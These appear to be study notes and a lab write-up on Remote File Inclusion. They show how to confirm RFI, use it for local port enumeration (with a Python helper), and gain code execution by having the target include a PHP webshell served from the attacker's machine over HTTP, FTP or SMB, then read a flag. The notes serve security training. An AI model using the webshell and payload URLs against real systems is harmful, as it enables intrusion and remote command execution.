# Intro
- Remote File Inclusion (RFI) allows us to:
- Enumerate local-only ports and web apps, i.e. use the include as an SSRF primitive
- Gain remote code execution by including a malicious script hosted on our Kali machine
|**Function**|**Read Content**|**Execute**|**Remote URL**|
|---|:-:|:-:|:-:|
|**PHP**||||
|`include()`/`include_once()`|✅|✅|✅|
|`file_get_contents()`|✅|❌|✅|
|**Java**||||
|`import`|✅|✅|✅|
|**.NET**||||
|`@Html.RemotePartial()`|✅|❌|✅|
|`include`|✅|✅|✅|
# Verify RFI
## Method A
- Check whether the `allow_url_include` setting is enabled (it is off by default)
- This is a `php.ini` directive, so pull the PHP configuration file (rather than the web app's own `config.php`) through the LFI as a base64 string, e.g. with the `php://filter/convert.base64-encode` wrapper, then decode it locally and look for `allow_url_include = On`
```bash
echo '<base64_string>' | base64 -d | grep allow_url_include
```
## Method B
- The above method is not always reliable: even if the setting is enabled, the vulnerable function may not allow remote URL inclusion to begin with (see the table above)
- A more reliable way to determine whether an LFI vulnerability is also an RFI is to try to include a URL and see whether we get its content
- Start by including a local URL (the target's own web server) so the attempt cannot be blocked by a firewall or egress filtering on the way out
```url
http://<SERVER_IP>:<PORT>/index.php?language=http://127.0.0.1:80/index.php
```
![[images/Pasted image 20251219191513.png]]
- In the above example, the `index.php` page is included in the vulnerable section (i.e. History Description), so the page is indeed vulnerable to RFI
- Furthermore, the `index.php` page was not included as source code text but got executed and rendered as PHP, so the vulnerable function also allows PHP execution, which means a malicious PHP script hosted on our machine will execute too
- Had it come back as raw `<?php` source instead, the function would read remote files but not execute them (read ✅, execute ❌ in the table above), which is still useful for SSRF but not for RCE this way
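The Method B decision, plus the port-enumeration use of the same include from the intro, as an added example (not code from the page or from HTB). The response bodies are constructed stand-ins for what the vulnerable `index.php` returns, with the History Description field modelled as the `<p>` after the heading; compare the probe response against a baseline response for a harmless `language` value and classify what was injected.

```python
"""Method B decision logic plus the SSRF/port-enumeration use of the same
include. Added example for these notes, not part of the original page; the
response bodies are constructed stand-ins for what the vulnerable index.php
returns (the History Description field is the <p> after the heading)."""
import re

BASELINE = "<html><body><h2>History</h2><p></p></body></html>"
# A function like file_get_contents(): index.php comes back as raw source.
AS_SOURCE = BASELINE.replace(
    "<p></p>",
    "<p><?php if (isset($_GET['language'])) { include($_GET['language']); } ?></p>")
# include(): index.php is executed and its rendered HTML nests inside ours.
EXECUTED = BASELINE.replace("<p></p>", "<p>" + BASELINE + "</p>")


def extract_included(baseline: str, probe: str) -> str:
    """Return what the include injected: drop the longest prefix and suffix
    the probe response shares with the baseline. If injected content begins
    or ends with the same characters as the surrounding markup the boundary
    can shift by a character; harmless for the checks below."""
    limit = min(len(baseline), len(probe))
    pre = 0
    while pre < limit and baseline[pre] == probe[pre]:
        pre += 1
    suf = 0
    while suf < limit - pre and baseline[-1 - suf] == probe[-1 - suf]:
        suf += 1
    return probe[pre:len(probe) - suf]


def _count(pattern: str, text: str) -> int:
    return len(re.findall(pattern, text, re.I))


def classify_include(baseline: str, probe: str) -> str:
    """'none'     nothing injected: allow_url_include off, the function cannot
                  fetch URLs, or the request was blocked on the way out
       'source'   PHP tags appeared: the file was read but not executed
       'rendered' extra HTML without PHP tags: index.php was executed, so a
                  hosted shell.php will execute as well
       'text'     something plain came back (a banner, command output)"""
    if not extract_included(baseline, probe):
        return "none"
    if _count(r"<\?(?:php|=)", probe) > _count(r"<\?(?:php|=)", baseline):
        return "source"
    tags = r"<(?:html|body|head|div|p|h\d)\b"
    if _count(tags, probe) > _count(tags, baseline):
        return "rendered"
    return "text"


def infer_open_ports(baseline: str, responses: dict) -> list:
    """responses maps port -> body for language=http://127.0.0.1:<port>/ .
    A closed port injects nothing (PHP fails to open the stream); a port that
    injects anything accepted the connection and answered. Caveat: a service
    that does not speak HTTP also fails the http:// wrapper and looks closed
    unless PHP warnings are displayed in the page."""
    return sorted(port for port, body in responses.items()
                  if extract_included(baseline, body))


if __name__ == "__main__":
    for name, body in (("baseline", BASELINE), ("source", AS_SOURCE),
                       ("executed", EXECUTED)):
        print(f"{name:8s} -> {classify_include(BASELINE, body)}")
    # Constructed scan: 80 is the web app itself, 22 gives nothing back
    # through the http:// wrapper, 8080 answers with a login page.
    scan = {80: EXECUTED, 22: BASELINE,
            8080: BASELINE.replace("<p></p>", "<p>Jenkins login</p>")}
    print("ports answering through the include:", infer_open_ports(BASELINE, scan))
```

In practice the baseline is the response for a value that includes nothing (an empty or nonexistent language), and each probe is the same request with `language=http://127.0.0.1:<port>/`; only the injected part is compared, so page chrome that changes between requests (timestamps, CSRF tokens) should be kept out of the compared region.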
# RCE with RFI
## HTTP
- First, create a malicious script in the language of the web app
```bash
echo '<?php system($_GET["cmd"]); ?>' > shell.php
```
- Second, host script via HTTP
```bash
python3 -m http.server <LISTENING_PORT>
```
- Finally, include our hosted shell through the RFI vuln and specify a command to execute. `cmd` is appended with `&` so that it is a parameter of the request to the target: the shell runs on the target, and `$_GET["cmd"]` is read from the target's query string, not from the URL PHP fetched from our server
```url
http://<SERVER_IP>:<PORT>/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id
```
![[images/Pasted image 20251219192236.png]]
## FTP
- Starting from step two, host script via FTP
```shell-session
sudo python -m pyftpdlib -p 21
```
- Finally, include our hosted shell through the RFI vuln and specify a command to execute
```url
http://<SERVER_IP>:<PORT>/index.php?language=ftp://<OUR_IP>/shell.php&cmd=id
```
![[images/Pasted image 20251219192415.png]]
- If the FTP server does not allow anonymous login, credentials can be put in the URL; `curl` works just as well as the browser for sending the request
```bash
curl 'http://<SERVER_IP>:<PORT>/index.php?language=ftp://user:pass@<OUR_IP>/shell.php&cmd=id'
```
## SMB
- IMPORTANT: If the vulnerable web application is hosted on a Windows server (which we can tell from the `Server` header in the HTTP response), then we do not need the `allow_url_include` setting to be enabled for RFI exploitation, as we can use the SMB protocol for the remote file inclusion
- This is because Windows treats files on remote SMB servers as normal files, which can be referenced directly with a UNC path (so PHP sees a local path, not a URL)
- This technique is most likely to work when we are on the same network as the target, as outbound SMB to remote servers over the internet may be blocked, depending on the Windows server config
- Starting from step two, host script via SMB
```bash
impacket-smbserver -smb2support share $(pwd)
```
- Finally, include our hosted shell through the RFI vuln and specify a command to execute
```url
http://<SERVER_IP>:<PORT>/index.php?language=\\<OUR_IP>\share\shell.php&cmd=whoami
```
![[images/Pasted image 20251219192824.png]]
# Exercise
- Ping test ![[images/Pasted image 20251219193136.png]]
- nmap scans ![[images/Pasted image 20251219193151.png]]
- Visit page ![[images/Pasted image 20251219193246.png]]
- Try RFI on `localhost`
- Definitely get odd feedback in the history section, which must be vulnerable to RFI ![[images/Pasted image 20251219193436.png]]
- Create a webshell script
```bash
echo '<?php system($_GET["cmd"]); ?>' > shell.php
```
![[images/Pasted image 20251219193601.png]]
- Host `shell.php` via HTTP
```bash
python3 -m http.server 80
```
![[images/Pasted image 20251219193651.png]]
- Try the below URL
```url
http://10.129.138.33/index.php?language=http://10.10.15.249:80/shell.php?cmd=whoami
```
- We got a hit on the HTTP server ![[images/Pasted image 20251219193902.png]]
- The output on the page seems borked though ![[images/Pasted image 20251219193907.png]]
- Similar issues with other commands
## FTP
- Host `shell.php` via FTP ![[images/Pasted image 20251219194358.png]]
- Use below URL
```url
http://10.129.138.33/index.php?language=ftp://10.10.15.249:21/shell.php?cmd=id
```
- The request hit the ftp server ![[images/Pasted image 20251219194450.png]]
- But we are getting similar errors ![[images/Pasted image 20251219194456.png]]
# MISSING &
- We used a `?` before the specified command, whereas we should be using an `&`
- Try http version again
- Start http server
- Use below URL
```url
http://10.129.138.33/index.php?language=http://10.10.15.249:8080/shell.php&cmd=id
```
- Now we are cooking ![[images/Pasted image 20251219195112.png]]
- List contents of `/` directory with below URL
```url
http://10.129.138.33/index.php?language=http://10.10.15.249:8080/shell.php&cmd=ls%20/
```
![[images/Pasted image 20251219195315.png]]
- `cat` the flag within `/exercise`
```url
http://10.129.138.33/index.php?language=http://10.10.15.249:8080/shell.php&cmd=cat+/exercise/flag.txt
```
![[images/Pasted image 20251219195456.png]]